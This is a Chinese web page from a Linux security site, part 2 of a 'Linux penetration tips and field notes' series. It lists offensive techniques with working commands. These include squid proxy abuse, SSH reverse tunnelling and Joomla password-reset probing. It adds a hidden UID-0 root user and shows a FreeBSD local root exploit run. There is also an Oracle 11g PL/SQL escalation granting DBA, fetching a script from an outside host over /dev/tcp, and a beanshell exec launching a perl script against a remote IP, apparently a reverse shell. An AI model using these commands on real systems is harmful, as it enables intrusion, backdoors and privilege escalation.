Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

无线路由器886N 无线路由器886N千兆版
会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

Linux渗透技巧+实战手记(2)

日期:2010-10-18 点击:194 来源: 未知 分享至:

成功上传
楼上就是实战的技巧

四.squid渗透技巧
nc -vv baidu.com 80
GET HTTP://www.sina.com / HTTP/1.0
GET HTTP://WWW.sina.com:22 / HTTP/1.0
动画地址和密码:
http://www.neeao.com/share/cnbir ... %BC%8F%E6%B4%9E.rar

五.SSH端口转发
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

六.joomla渗透小技巧
确定版本
index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

重新设置密码
index.php?option=com_user&view=set.html' target='_blank'>reset&layout=confirm

七: Linux添加UID为0的root用户
dd.html' target='_blank'>useradd -o -u 0 nothack

八.freebsd本地提权
[argp@julius ~]$ uname -rsi
* freebsd 7.3-RELEASE GENERIC
* [argp@julius ~]$ sysctl vfs.usermount
* vfs.usermount: 1
* [argp@julius ~]$ id
* uid=1001(argp) gid=1001(argp) groups=1001(argp)
* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
* [argp@julius ~]$ ./nfs_mount_ex
*

  • calling nmount()
    * [!] nmount error: -1030740736
    * nmount: Unknown error: -1030740736
    * [argp@julius ~]$ id
    * uid=0(root) gid=0(wheel) egid=1001(argp) groups=1001(argp)

    九.ldap技巧更新(xi4oyu提供)
    ldapsearch -x -s base -b "" "objectClass=*" +
    能够获得LDAP SERVER version naming context 加密选项,认证方式等详细的信息。

ldapsearch -x -b \'\' -s base \'(objectclass=*)\' namingContexts

获取namingContexts

具体的 oid信息可以在:http://www.alvestrand.no/objectid/top.html查到

列树

ldapsearch -x -H ldap://xxxxx/

猜测,看是否可写

ldapadd .....

找slapd.conf

openldap/ldap.conf

local:

slapcat

十.memcached渗透技巧
memcached lnet.html' target='_blank'>telnet操作

telnet localhost 11211
//保存
set good 32 0 10
helloworld
STORED

//取回
gets good
VALUE good 32 10 10
helloworld
END

//替换
replace good 32 0 10
worldhello
STORED
get good
VALUE good 32 10
worldhello
END

//尾部添加
append good 32 0 5
after
STORED
get good
VALUE good 32 15
worldhelloafter
END

//头部添加
prepend good 32 0 6
before
STORED
get good
VALUE good 32 21
beforeworldhelloafter
END

//删除
delete good
DELETED
get good
END


delete good
NOT_FOUND


cas good 32 0 10 hel
helloworld
EXISTS

gets good
VALUE good 32 10 10
helloworld
END


cas bad 32 0 10 good
worldhello
NOT_FOUND


//统计
stats items
STAT items:1:number 1
STAT items:1:age 24
STAT items:1:evicted 0
STAT items:1:outofmemory 0
END


stats sizes
96 1
END

stats slabs
STAT 1:chunk_size 88
STAT 1:chunks_per_page 11915
STAT 1:total_pages 1
STAT 1:total_chunks 11915
STAT 1:used_chunks 11914
STAT 1:free_chunks 1
STAT 1:free_chunks_end 11913
STAT 2:chunk_size 112
STAT 2:chunks_per_page 9362
STAT 2:total_pages 1
STAT 2:total_chunks 9362
STAT 2:used_chunks 9361
STAT 2:free_chunks 1
STAT 2:free_chunks_end 9361
STAT 5:chunk_size 232
STAT 5:chunks_per_page 4519
STAT 5:total_pages 1
STAT 5:total_chunks 4519
STAT 5:used_chunks 4518
STAT 5:free_chunks 1
STAT 5:free_chunks_end 4518
STAT active_slabs 3
STAT total_malloced 3145472
END


stats items
STAT items:1:number 1
STAT items:1:age 1768
STAT items:1:evicted 0
STAT items:1:outofmemory 0
END

stats
STAT pid 18261
STAT uptime 528593
STAT time 1237277383
STAT version 1.2.6
STAT pointer_size 32
STAT rusage_user 0.004999
STAT rusage_system 0.015997
STAT curr_items 1
STAT total_items 2
STAT bytes 66
STAT curr_connections 2
STAT total_connections 13
STAT connection_structures 3
STAT cmd_get 11
STAT cmd_set 8
STAT get_hits 2
STAT get_misses 9
STAT evictions 0
STAT bytes_read 1342
STAT bytes_written 8752
STAT limit_maxbytes 134217728

STAT threads 1
END


使用usr/bin/perl /root/memcached-1.2.6/scripts/memcached-tool localhost:11211
output
# Item_Size   Max_age 1MB_pages Count   Full?
1      88 B     1531 s       1       1      no
2     112 B        0 s       1       0      no
5     232 B        0 s       1       0      no

# slab class编号
Item_Size Chunk大小
Max_age LRU内最旧的记录的生存时间
1MB_pages 分配给Slab的页数
Count Slab内的记录数
Full? Slab内是否含有空闲chunk

十一.无wget下载文件
假设要下载http://yese.yi.org/c.pl

exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0n" >&5 && cat<&5 > c.pl

当然http头你要自己去掉

当然,你用nc -l -p 80 <c.pl 就不用这么麻烦了

十二.ORACLE 11G提权
DBMS_JVM_EXP_PERMS 中的IMPORT_JVM_PERMS

判断登陆权限
select * from session_privs;
CREATE SESSION

select * from session_roles;

select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY WHERE GRANTEE = \'GREMLIN(用户名)\';

DESC JAVA$POLICY$

DECLARE
POL DBMS_JVM_EXP.TEMP_JAVA_POLICY;
CURSOR C1 IS SELECT \'GRANT\' USER(), \'SYS\', \'java.io.FilePermission\', \'<<ALL FILES>>\', \'execute\', \'ENABLE\' FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

connect / as sysdba
COL TYPE_NAME FOR A30;
COL NAME FOR A30;
COL_ACTION FOR A10;
SELECT TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY WHERE GRANTEE = \'用户\';

connect 普通用户
set serveroutput on
exec dbms_java.set_output(10000);

SELECT DBMS_JAVA.SET_OUTPUT_TO_JAVA(\'ID\', \'oracle/aurora/rdbms/DbmsJava\', \'SYS\', \'writeOutputToFile\', \'TEXT\', NULL, NULL, NULL, NULL,0,1,1,1,1,0, \'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;\'BEGIN EXECUTE IMMEDIATE \'\'GRANT DBA TO 用户\'\'; END;\', \'BEGIN NULL; END;\') FROM DUAL;

EXEC DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOWS(\'NO_SUCH_SUBSCRIPTION\', SYSDATE());

set role dba;

select * from session_privs;

EXEC SYS.VULNPROC(\'FOO"||DBMS_JAVA.SET_OUTPUT_TO_SQL("ID","DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE""GRANT DBA TO PUBLIC"";DBMS_OUTPUT.PUT_LINE(:1);END;","TEXT")||"BAR\');

SELECT DBMS_JAVA.RUNJAVA(\'oracle/aurora/util/Test\') FROM DUAL;

SET ROLE DBA;

十三:beanshell渗透技巧
exec("/usr/bin/perl /var/tmp/c.pl 218.56.57.151 53");
实例:XXX易多台beanshell漏洞咋不发布,等漏洞修补发布


Tags: linux渗透
分享至:
最新图文资讯
1 2 3 4 5 6
相关文章列表:
验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
推荐内容
最新文章
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史

Copyright © 2010-2015 Linux安全网 LinuxSo.Com, All Rights Reserved. 豫ICP备12027123号-1